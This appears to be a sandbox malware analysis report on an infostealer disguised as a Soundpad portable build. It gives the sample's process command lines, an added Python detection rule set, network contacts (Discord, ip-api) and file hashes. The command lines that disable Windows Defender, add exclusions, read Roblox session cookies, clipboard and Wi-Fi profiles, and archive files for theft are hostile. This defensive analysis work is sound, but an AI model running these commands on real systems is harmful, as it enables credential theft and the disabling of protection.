C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe
"C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe
"C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kaxfwgoa\kaxfwgoa.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx1.8.0.dll"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a4 0x4fc
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85F9.tmp" "c:\Users\Admin\AppData\Local\Temp\kaxfwgoa\CSC488C7A925448404E8247E57CD926F946.TMP"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\l1sYo.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\l1sYo.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\GetCopy.TS"
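The process list above is what an analyst has to turn into a detection: every command in it (tasklist, systeminfo, tree, getmac, a WMIC query) is harmless on its own, and it is the combination under one parent that identifies the stealer. The following Python, added here as an example and not code from the report or from the analysed sample, scores process-creation events per parent process against the reconnaissance and staging commands shown in the list: the SecurityCenter2 antivirus enumeration, the clipboard read, the WLAN profile dump, the .ROBLOSECURITY lookup, the attrib -r/+r toggle on the hosts file, the hosts-path registry query, the password-protected rar archive, HWID collection and encoded PowerShell. The sample events are built from command lines on this page; the parent PIDs (2800 is the PID the report's memory dumps reference, treating it as the parent is an assumption), the rule weights and the alert threshold are constructed for this example.

```python
"""
Added example (not code from the report or from the analysed sample): score
process-creation events per parent process against the reconnaissance and
staging chain visible in the sandbox process list.  Sample events are
constructed from command lines in the report; parent PIDs, weights and the
threshold are assumptions for this example.
"""
import re

# (rule name, regex applied to the full command line, weight).  Each regex is
# written against a command line that appears in the report.
RULES = [
    ("av_enum_securitycenter2", r"SecurityCenter2.*AntivirusProduct", 3),
    ("clipboard_read",          r"powershell.*Get-Clipboard", 2),
    ("wifi_profile_dump",       r"netsh\s+wlan\s+show\s+profile", 2),
    ("roblox_cookie_theft",     r"RobloxStudioBrowser.*\.ROBLOSECURITY", 4),
    ("hosts_attrib_toggle",     r"attrib\s+[-+]r\s+.*drivers\\etc\\hosts", 3),
    ("hosts_path_lookup",       r"Tcpip\\Parameters\s+/V\s+DataBasePath", 2),
    ("rar_password_archive",    r"\brar(?:\.exe)?\b.*\s-hp", 3),
    ("hwid_collection",         r"csproduct\s+get\s+uuid|PROCESSOR_IDENTIFIER|BackupProductKeyDefault", 2),
    ("encoded_powershell",      r"powershell(?:\.exe)?\s.*-EncodedCommand", 2),
    ("process_listing",         r"tasklist\s+/FO\s+LIST", 1),
    ("filesystem_tree",         r"\btree\s+/A\s+/F\b", 1),
]
_COMPILED = [(name, re.compile(rx, re.IGNORECASE), w) for name, rx, w in RULES]
_WEIGHTS = {name: w for name, _rx, w in RULES}

ALERT_THRESHOLD = 8  # assumption: a lone tasklist/tree/systeminfo must stay well below this


def score_parents(events):
    """Return {ppid: (score, sorted rule names)}, each rule counted once per parent.

    Counting a rule once per parent keeps the repeated 'tree /A /F' and
    'tasklist' runs seen in the report from inflating the score by themselves.
    """
    hits = {}
    for ev in events:
        names = hits.setdefault(ev["ppid"], set())
        for name, rx, _w in _COMPILED:
            if rx.search(ev["cmdline"]):
                names.add(name)
    return {ppid: (sum(_WEIGHTS[n] for n in names), sorted(names))
            for ppid, names in hits.items()}


def alerts(events, threshold=ALERT_THRESHOLD):
    """Parent PIDs whose aggregated score reaches the threshold."""
    return [ppid for ppid, (score, _names) in score_parents(events).items()
            if score >= threshold]


_RAR_PW = re.compile(r'-hp"?([^"\s]+)"?')


def archive_password(cmdline):
    """Recover the -hp password from a rar command line, or None.

    -hp encrypts file names as well as contents, so the staged archive cannot
    even be listed without this value; the command line is where it leaks.
    """
    m = _RAR_PW.search(cmdline)
    return m.group(1) if m else None


# Constructed sample: child command lines from the report attributed to parent
# 2800 (assumption), plus a few benign admin commands under a made-up parent.
SAMPLE_EVENTS = [
    {"ppid": 2800, "cmdline": r"tasklist /FO LIST"},
    {"ppid": 2800, "cmdline": r"WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"},
    {"ppid": 2800, "cmdline": r"powershell Get-Clipboard"},
    {"ppid": 2800, "cmdline": r"tree /A /F"},
    {"ppid": 2800, "cmdline": r"netsh wlan show profile"},
    {"ppid": 2800, "cmdline": r"systeminfo"},
    {"ppid": 2800, "cmdline": r"REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"},
    {"ppid": 2800, "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <payload not shown in report>"},
    {"ppid": 2800, "cmdline": r"attrib -r C:\Windows\System32\drivers\etc\hosts"},
    {"ppid": 2800, "cmdline": r"attrib +r C:\Windows\System32\drivers\etc\hosts"},
    {"ppid": 2800, "cmdline": r"powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"},
    {"ppid": 2800, "cmdline": r"getmac"},
    {"ppid": 2800, "cmdline": r'C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\l1sYo.zip" *'},
    {"ppid": 2800, "cmdline": r"wmic csproduct get uuid"},
    {"ppid": 2800, "cmdline": r"powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"},
    {"ppid": 2800, "cmdline": r"wmic path win32_VideoController get name"},
    {"ppid": 4400, "cmdline": r"tasklist /FO LIST"},
    {"ppid": 4400, "cmdline": r"systeminfo"},
    {"ppid": 4400, "cmdline": r"tree /A /F"},
]

if __name__ == "__main__":
    for ppid, (score, names) in score_parents(SAMPLE_EVENTS).items():
        flag = "ALERT" if score >= ALERT_THRESHOLD else "ok"
        print(f"ppid={ppid} score={score} {flag} {names}")
    print("archive password:", archive_password(SAMPLE_EVENTS[12]["cmdline"]))
```

On the constructed sample the stealer parent hits all eleven rules and scores 25, while the admin parent running tasklist, systeminfo and tree scores 2 and stays silent. The password extractor is there because the archive staged as l1sYo.zip is created with rar -hp, which encrypts headers as well as data; the only place the password appears in the clear is the command line, so a collector that truncates long command lines loses the one value needed to inspect what was about to be exfiltrated.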
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | blank-ymkfz.in | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI26682\python312.dll
| MD5 | cbd02b4c0cf69e5609c77dfd13fba7c4 |
| SHA1 | a3c8f6bfd7ffe0783157e41538b3955519f1e695 |
| SHA256 | ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5 |
| SHA512 | a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/2800-26-0x00007FF9F2CD0000-0x00007FF9F33A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI26682\base_library.zip
| MD5 | 630153ac2b37b16b8c5b0dbb69a3b9d6 |
| SHA1 | f901cd701fe081489b45d18157b4a15c83943d9d |
| SHA256 | ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2 |
| SHA512 | 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_ctypes.pyd
| MD5 | e7629e12d646da3be8d60464ad457cef |
| SHA1 | 17cf7dacb460183c19198d9bb165af620291bf08 |
| SHA256 | eb8affa4e7a4da15c9cda37c68ac8232d885a9d367b28973473949b205384789 |
| SHA512 | 974ae1607093161a5f33eda9e0a0ade214700d05eb728c8157e7b7589c587cc1cdefe0132d16d31c2941ed4eec4668428564609a0a2ced983c8b13f98a84801b |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_ssl.pyd
| MD5 | a9f1bda7447ab9d69df7391d10290240 |
| SHA1 | 62a3beb8afc6426f84e737162b3ec3814648fe9f |
| SHA256 | 2bb05f7dbd21e67d2a6671411f8ae503dd7538a6767b2169b3033b695557ac13 |
| SHA512 | 539e94b59093dcf62d6f1a312d9b6aac27873f6416cde050e756e367b9907a8c0e7a31109a433b206bf023436d823d3d945f695cc7291604c0a24bcd27dc1451 |
memory/2800-50-0x00007FFA0AD10000-0x00007FFA0AD1F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_sqlite3.pyd
| MD5 | b8aa2de7df9ba5eab6609dcf07829aa6 |
| SHA1 | 4b8420c44784745b1e2d2a25bd4174fc3da4c881 |
| SHA256 | 644669d0875b33aa7e9d3f1856bc8b696f796ad61c7edb9219f8f0ff1a69531a |
| SHA512 | 5587efef4c349a137d785594bb7cbffef19fd418bf7d6fb2a4a3e2107354f5f874eeb7e18799031bde335bc65e4ca53f73793a60c67a5482c7e6d1564894ba17 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_socket.pyd
| MD5 | 4ee9483c490fa48ee9a09debe0dd7649 |
| SHA1 | f9ba6501c7b635f998949cf3568faf4591f21edd |
| SHA256 | 9c644a6db56052cf2680476648391b47b603957ffb353ad44a68dac761805ef1 |
| SHA512 | c55ddd782cc52d1aba6fd4466ed72387aad4debd3c48315db16aa35d3a5265478d8b197a3a0e0bcf9277004c10b4ccfe8706ab9d0e886d19c0cc4cb406fab4a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_queue.pyd
| MD5 | 048e8e18d1ae823e666c501c8a8ad1dd |
| SHA1 | 63b1513a9f4dfd5b23ec8466d85ef44bfb4a7157 |
| SHA256 | 7285eef53fd485d6093a9aecbe8fc87c6d70ae4e91d41f382a2a3edff7ebc6c8 |
| SHA512 | e57e162d1099b696d11bad172d36824a41fde3dd1d3be0dbd239746f8c87f17e78f889c8ad75ffdac89032b258e6f55f0dab82aae21b9d7ad166ceedfe131b61 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_lzma.pyd
| MD5 | ed348285c1ad1db0effd915c0cb087c3 |
| SHA1 | b5b8446d2e079d451c2de793c0f437d23f584f7b |
| SHA256 | fa84770ccf4394d046ed69edaea71957306a25def4986ee6650daf0a2c2d3e43 |
| SHA512 | 28a4c21bdb0bd697e93b276c184bfc5e317d930c4462e655d9d9ef7487168809ee952e32a856304cdd67a76d6b2286bf94fe9b9de6706c8d36a810aa916ce8e1 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_hashlib.pyd
| MD5 | 3c1056edef1c509136160d69d94c4b28 |
| SHA1 | e944653161631647a301b3bddc08f8a13a4bf23e |
| SHA256 | 41e4bb3c6064cb9e8a62e17056aea19e3d7e6ff1efc17c18d76118ac4e3b7243 |
| SHA512 | a03fcf2af6df72923714f66d26774a39e709fa8ad879d72b838d531692231f68480b5ff65b83358ad6b7b411f4ece7028a8613c3b1177acf1d3c933a843ca19a |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_decimal.pyd
| MD5 | 94fbb133e2b93ea55205ecbd83fcae39 |
| SHA1 | 788a71fa29e10fc9ea771c319f62f9f0429d8550 |
| SHA256 | f8e8fbeee7c8454fa42fe47f1da9c63f6b6e631b0dff22c80631f426efcba78b |
| SHA512 | b488f06be28fc8ffd3d8be6b986c7a35ab868198b10943bfa59b9130ebd50354adb9e1818b73ed1f2c92d33d869091e9167346b4430668ca31dd46a845276dea |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_bz2.pyd
| MD5 | ba8871f10f67817358fe84f44b986801 |
| SHA1 | d57a3a841415969051826e8dcd077754fd7caea0 |
| SHA256 | 9d30387ee07585516f8ce479fcd4e052597835d4149568c1d8382a4a3a0ae7e1 |
| SHA512 | 8e23b032b785f37b920206fa3064c5fa0e28949f23b2e985fae26c9a355a6bc33dcd380925091f627d4d7936f0958e90fa7c022d89c73db8a1ea6ad267a1a341 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\unicodedata.pyd
| MD5 | 9a03b477b937d8258ef335c9d0b3d4fa |
| SHA1 | 5f12a8a9902ea1dc9bbb36c88db27162aa4901a5 |
| SHA256 | 4d6e035a366c6f74660f74b8b816add345fa7f1c6cf0793dcf1ed9f91b6ce6a4 |
| SHA512 | d3d8bb51474f93d02837580f53aacf5ca9eaf8587e83cddb742c707a251fe86f14e8e665aa4423ac99d74c6c94d95c7df3bfd513b3d5c69661e604f22dcabebe |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\sqlite3.dll
| MD5 | ce4f27e09044ec688edeaf5cb9a3e745 |
| SHA1 | b184178e8a8af7ac1cd735b8e4b8f45e74791ac9 |
| SHA256 | f940ff66960441c76a258846d66d4a357e72ad8fbb6bde62b5e5fbe90103b92d |
| SHA512 | bab572324dcf12e71fb6a9648e9224528bd29c75e7d3b978b7068eca0d6f2cb795165756249f47e1db401267b0a1e5fd06c35b6cf5595a013240f9e3444ea083 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\select.pyd
| MD5 | a71d12c3294b13688f4c2b4d0556abb8 |
| SHA1 | 13a6b7f99495a4c8477aea5aecc183d18b78e2d4 |
| SHA256 | 0f3ae1b65102d38f6b33fcbbdadd347aa1b0c09ed8028d4412982b3bd97caf0f |
| SHA512 | ff16cb399b661c170bf79108c62010d32804ead3f6c565b0755a26b62b4f51290bcb71face6cebaa82c0f9b3863aaaa7fa57ddc1e2bbae8598b047d01d15cbe5 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\rarreg.key
| MD5 | 9795f79ddb61aa29027f4d68496b379c |
| SHA1 | 2b28db4d9ac8cffba73048444b1df25346f4ef32 |
| SHA256 | e63f3d6710097498085564dfc85add6ed4cf44238c33d20820d2426abcee4e31 |
| SHA512 | e44fbbc02da75d173c81bdfda9b14102997609af06fd50c51030430c3c80193dadb632592997361c79b0dfed50ccc0e1743c306a881401a1c78a6a7facb45d4d |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\bound.blank
| MD5 | 2b107e37d9ee876980394e254271cb4d |
| SHA1 | c31d3e61aa44a33b1216d97cae0bb59f84a5a98a |
| SHA256 | 002b3d8ec6bdb3f7b5e4fb31225d9dbef558cf2d52a8f3a2b5a4f152a40646a8 |
| SHA512 | 13c51c3ec9af648948c412d695301010bd68412cc052dacbe97b4d2d5e32c2c5de4b5581f169c321abe7df7d89f4249fce8154360b6f832791f4a8d478a85c95 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\blank.aes
| MD5 | 923406a783d22bb46787bfb63c2ea5e1 |
| SHA1 | b49f517839e2bb076924212987c5979e74f5817c |
| SHA256 | e34ef541a5805cce13194a6f53994872603fe642adfdf03408018ed24601adc8 |
